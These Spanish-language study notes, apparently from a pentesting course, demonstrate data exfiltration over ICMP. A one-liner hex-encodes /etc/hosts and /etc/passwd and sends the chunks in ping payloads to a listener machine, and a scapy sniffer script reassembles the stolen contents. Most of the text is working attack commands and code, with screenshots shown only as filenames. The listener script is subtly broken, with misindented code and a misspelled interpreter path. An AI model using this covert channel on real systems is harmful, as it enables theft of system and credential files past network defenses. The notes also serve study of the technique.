Usando ICMP

Ejemplo :

Terminal N° 1

Captura de paquetes que viajan en la interfaz loopback(lo)

sudo tcpdump -i lo -w capture.cap -n -v

20240713012915.png

Terminal N° 2

Ping con envió de paquetes en hexadecimal

xxd -p -c 4 /etc/hosts| while read line; do ping -c 1 -p $line 127.0.0.1; done

20240713012927.png

Tratamiento de la data

from scapy.all import *
rdpcap("capture.cap")
packets=rdpcap("capture.cap")

20240713012942.png

packets[1]

20240713012949.png

>>> ls(packets[0][ICMP])

20240713013039.png

>>> packets[0][ICMP].load

20240713013045.png

20240713013050.png

20240713013053.png

#!/usr/bin/pytyhon3

from scapy.all import ICMP, sniff
import signal, time, sys


#Ctrl_c

def def_handler(sig, frame):
	print("[+] Saliendo ... ")
	sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def data_parser(packet):
	if packet.haslayer(ICMP):
		if packet[ICMP].type == 8:
			data = packet[ICMP].load[-4:].decode("utf-8")
				print(data, flush=True, end='')

if __name__=='__main__':
	sniff(iface="tun0", prn=data_parser)

20240713013114.png

sudo python3 icmp_exfiltration

20240713013125.png

Ejemplo

Codigo para la ejecucion a nivel de red local

#!/usr/bin/pytyhon3

from scapy.all import ICMP, sniff
import signal, time, sys


#Ctrl_c

def def_handler(sig, frame):
	print("[+] Saliendo ... ")
	sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def data_parser(packet):
	if packet.haslayer(ICMP):
		if packet[ICMP].type == 8:
			data = packet[ICMP].load[-4:].decode("utf-8")
				print(data, flush=True, end='')

if __name__=='__main__':
	sniff(iface="eth0", prn=data_parser)

Maquina Ubuntu

xxd -p -c 4 /etc/passwd| while read line; do ping -c 1 -p $line 192.168.1.5; done

20240713013142.png

cat /etc/passwd 

20240713013203.png

Maquina Kali

sudo python3 icmp_exfiltration.py

20240713013211.png

20240713013217.png